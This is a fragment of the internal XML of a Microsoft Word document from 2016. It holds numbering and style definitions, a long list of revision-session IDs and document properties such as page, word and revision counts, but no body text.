    <w:lvl w:ilvl="0" w:tplc="D35AA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216202"/>
    <w:multiLevelType w:val="hybridMultilevel"/>
    <w:tmpl w:val="2918F442"/>
    <w:lvl w:ilvl="0" w:tplc="97E0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60"/>
    <w:rsid w:val="00023010"/>
    <w:rsid w:val="0003433C"/>
    <w:rsid w:val="00040DBF"/>
    <w:rsid w:val="000B508A"/>
    <w:rsid w:val="000D141A"/>
    <w:rsid w:val="000F5BDB"/>
    <w:rsid w:val="00126D5C"/>
    <w:rsid w:val="00134501"/>
    <w:rsid w:val="00137B45"/>
    <w:rsid w:val="00155701"/>
    <w:rsid w:val="00157C77"/>
    <w:rsid w:val="00173E74"/>
    <w:rsid w:val="00195503"/>
    <w:rsid w:val="001A6462"/>
    <w:rsid w:val="001B7846"/>
    <w:rsid w:val="001E04C7"/>
    <w:rsid w:val="00245197"/>
    <w:rsid w:val="00251657"/>
    <w:rsid w:val="002846C5"/>
    <w:rsid w:val="002A290E"/>
    <w:rsid w:val="002B7CFF"/>
    <w:rsid w:val="002B7EF2"/>
    <w:rsid w:val="002C093D"/>
    <w:rsid w:val="002D19D6"/>
    <w:rsid w:val="0030763B"/>
    <w:rsid w:val="0031393D"/>
    <w:rsid w:val="00315423"/>
    <w:rsid w:val="00334380"/>
    <w:rsid w:val="003348DF"/>
    <w:rsid w:val="00355070"/>
    <w:rsid w:val="0036572B"/>
    <w:rsid w:val="00392E3D"/>
    <w:rsid w:val="0039634E"/>
    <w:rsid w:val="003C651B"/>
    <w:rsid w:val="003D333F"/>
    <w:rsid w:val="003F0761"/>
    <w:rsid w:val="0043628E"/>
    <w:rsid w:val="004562F9"/>
    <w:rsid w:val="00482B4A"/>
    <w:rsid w:val="004B2376"/>
    <w:rsid w:val="004D5C06"/>
    <w:rsid w:val="004E74EA"/>
    <w:rsid w:val="004F055D"/>
    <w:rsid w:val="004F67EC"/>
    <w:rsid w:val="005043F3"/>
    <w:rsid w:val="00523628"/>
    <w:rsid w:val="005251B2"/>
    <w:rsid w:val="00566C50"/>
    <w:rsid w:val="005A12C9"/>
    <w:rsid w:val="005B08B5"/>
    <w:rsid w:val="005D3942"/>
    <w:rsid w:val="005E2802"/>
    <w:rsid w:val="005F4BA3"/>
    <w:rsid w:val="006177FF"/>
    <w:rsid w:val="00623840"/>
    <w:rsid w:val="006246DC"/>
    <w:rsid w:val="0062471A"/>
    <w:rsid w:val="00624FEA"/>
    <w:rsid w:val="0063275C"/>
    <w:rsid w:val="00636738"/>
    <w:rsid w:val="00637660"/>
    <w:rsid w:val="006444C6"/>
    <w:rsid w:val="00670A13"/>
    <w:rsid w:val="0068380C"/>
    <w:rsid w:val="006A2A2C"/>
    <w:rsid w:val="006B7849"/>
    <w:rsid w:val="006D08CC"/>
    <w:rsid w:val="006F58DF"/>
    <w:rsid w:val="007239EE"/>
    <w:rsid w:val="007667FC"/>
    <w:rsid w:val="0077215E"/>
    <w:rsid w:val="007843EF"/>
    <w:rsid w:val="00792583"/>
    <w:rsid w:val="007B2781"/>
    <w:rsid w:val="007B4DDD"/>
    <w:rsid w:val="007D6E16"/>
    <w:rsid w:val="007E2E1C"/>
    <w:rsid w:val="00820C36"/>
    <w:rsid w:val="00836EAC"/>
    <w:rsid w:val="00842CB6"/>
    <w:rsid w:val="00853013"/>
    <w:rsid w:val="00855E33"/>
    <w:rsid w:val="00895D71"/>
    <w:rsid w:val="008C1FF8"/>
    <w:rsid w:val="008C626B"/>
    <w:rsid w:val="008D3EB2"/>
    <w:rsid w:val="00907539"/>
    <w:rsid w:val="0091775D"/>
    <w:rsid w:val="00921C3F"/>
    <w:rsid w:val="00922BCA"/>
    <w:rsid w:val="00932B29"/>
    <w:rsid w:val="009463B3"/>
    <w:rsid w:val="00975E63"/>
    <w:rsid w:val="00993DAC"/>
    <w:rsid w:val="009C1627"/>
    <w:rsid w:val="009E3BC2"/>
    <w:rsid w:val="009E4B67"/>
    <w:rsid w:val="009F76AE"/>
    <w:rsid w:val="00A25842"/>
    <w:rsid w:val="00A76B77"/>
    <w:rsid w:val="00A818BD"/>
    <w:rsid w:val="00AA2311"/>
    <w:rsid w:val="00B02358"/>
    <w:rsid w:val="00B04C7D"/>
    <w:rsid w:val="00B77BC7"/>
    <w:rsid w:val="00B80EEE"/>
    <w:rsid w:val="00B95D57"/>
    <w:rsid w:val="00BB1D9D"/>
    <w:rsid w:val="00BB2873"/>
    <w:rsid w:val="00BB454B"/>
    <w:rsid w:val="00BF0286"/>
    <w:rsid w:val="00C0530B"/>
    <w:rsid w:val="00C10C9B"/>
    <w:rsid w:val="00C159DD"/>
    <w:rsid w:val="00C52995"/>
    <w:rsid w:val="00C60D97"/>
    <w:rsid w:val="00C8171D"/>
    <w:rsid w:val="00C8389D"/>
    <w:rsid w:val="00C84C73"/>
    <w:rsid w:val="00C9388C"/>
    <w:rsid w:val="00C93EA0"/>
    <w:rsid w:val="00CF1760"/>
    <w:rsid w:val="00D433DE"/>
    <w:rsid w:val="00D47A59"/>
    <w:rsid w:val="00D72C07"/>
    <w:rsid w:val="00DD5E37"/>
    <w:rsid w:val="00DE478E"/>
    <w:rsid w:val="00DF62FB"/>
    <w:rsid w:val="00E17E4B"/>
    <w:rsid w:val="00E22DBC"/>
    <w:rsid w:val="00E307A8"/>
    <w:rsid w:val="00E64C9C"/>
    <w:rsid w:val="00E92FBA"/>
    <w:rsid w:val="00E934F2"/>
    <w:rsid w:val="00EC4147"/>
    <w:rsid w:val="00ED6A5F"/>
    <w:rsid w:val="00EE7507"/>
    <w:rsid w:val="00EF13D0"/>
    <w:rsid w:val="00EF2579"/>
    <w:rsid w:val="00EF7439"/>
    <w:rsid w:val="00F71D79"/>
    <w:rsid w:val="00F82BE4"/>
    <w:rsid w:val="00F96374"/>
    <w:rsid w:val="00FB0B6B"/>
    <w:rsid w:val="00FC32F9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6C8BB-61F9-4A51-A8FD-A28BA7BD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B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B6B"/>
    <w:pPr>
      <w:keepNext/>
      <w:keepLines/>
      <w:outlineLvl w:val="2"/>
    </w:pPr>
    <w:rPr>
      <w:b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0B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0B6B"/>
    <w:rPr>
      <w:b/>
      <w:bCs/>
      <w:sz w:val="22"/>
      <w:szCs w:val="32"/>
    </w:rPr>
  </w:style>
  <w:style w:type="character" w:customStyle="1" w:styleId="1Char">
    <w:name w:val="标题 1 Char"/>
    <w:basedOn w:val="a0"/>
    <w:link w:val="1"/>
    <w:uiPriority w:val="9"/>
    <w:rsid w:val="00FB0B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0B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B0B6B"/>
    <w:pPr>
      <w:ind w:leftChars="400" w:left="840"/>
    </w:pPr>
  </w:style>
  <w:style w:type="character" w:styleId="a3">
    <w:name w:val="Hyperlink"/>
    <w:basedOn w:val="a0"/>
    <w:uiPriority w:val="99"/>
    <w:unhideWhenUsed/>
    <w:rsid w:val="00FB0B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4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728D-AEEA-4B6F-A39F-BB305C96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4</Pages>
  <Words>2708</Words>
  <Characters>15441</Characters>
  <Application>Microsoft Office Word</Application>
  <DocSecurity>0</DocSecurity>
  <Lines>128</Lines>
  <Paragraphs>36</Paragraphs>
  <ScaleCrop>false</ScaleCrop>
  <Company>Microsoft</Company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Chao(BSP)</dc:creator>
  <cp:keywords/>
  <dc:description/>
  <cp:lastModifiedBy>Li,Chao(BSP)</cp:lastModifiedBy>
  <cp:revision>146</cp:revision>
  <dcterms:created xsi:type="dcterms:W3CDTF">2016-11-16T09:18:00Z</dcterms:created>
  <dcterms:modified xsi:type="dcterms:W3CDTF">2016-11-19T12:40:00Z</dcterms:modified>
</cp:coreProperties>
</file>